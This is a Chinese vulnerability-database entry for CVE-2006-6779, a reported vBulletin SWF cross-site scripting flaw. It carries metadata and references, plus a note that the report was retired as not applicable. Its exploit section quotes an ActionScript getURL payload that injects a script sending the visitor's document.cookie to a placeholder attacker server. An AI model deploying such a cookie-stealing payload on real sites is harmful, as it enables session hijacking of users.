vBulletin SWF跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111853 漏洞类型 跨站脚本
发布时间 2006-12-25 更新时间 2007-01-02
CVE编号 CVE-2006-6779 CNNVD-ID CNNVD-200612-570
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/29338
https://cxsecurity.com/issue/WLB-2006120152
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-570
|漏洞详情
vBulletin是一款开放源代码PHP论坛程序。JelsoftvBulletin存在跨站脚本攻击漏洞。攻击者能够向vBulletin上传包含有恶意actionscript帧的SWF文件的话,就可能执行跨站脚本攻击,导致在日志文件中泄露基于cookie的认证凭据。
|漏洞EXP
source: http://www.securityfocus.com/bid/21736/info

vBulletin is prone to a vulnerability that may let remote attackers inject arbitrary script code into the application.

If exploited, this vulnerability may let attackers steal cookie-based authentication credentials. Other attacks are also possible.

Update: Note that the ability to upload SWF files is disabled by default, and must be enabled by site administrators to expose this issue.

This BID is being retired because further information shows that the application is not vulnerable to this issue.

getURL("javascript:function blab(){}var scriptNode = 
+document.createElement('script');document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.src='http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie
+;blab();");
|参考资料

来源:BID
名称:21736
链接:http://www.securityfocus.com/bid/21736
来源:BUGTRAQ
名称:20061227Re:XSSwithVbulletin(newidea!)
链接:http://www.securityfocus.com/archive/1/archive/1/455351/100/0/threaded
来源:BUGTRAQ
名称:20061224XSSwithVbulletin(newidea!)
链接:http://www.securityfocus.com/archive/1/archive/1/455265/100/0/threaded
来源:XF
名称:vbulletin-actionscript-xss(31119)
链接:http://xforce.iss.net/xforce/xfdb/31119
来源:BUGTRAQ
名称:20061228Re:XSSwithVbulletin(newidea!)
链接:http://www.securityfocus.com/archive/1/archive/1/455414/100/0/threaded
来源:SREASON
名称:2084
链接:http://securityreason.com/securityalert/2084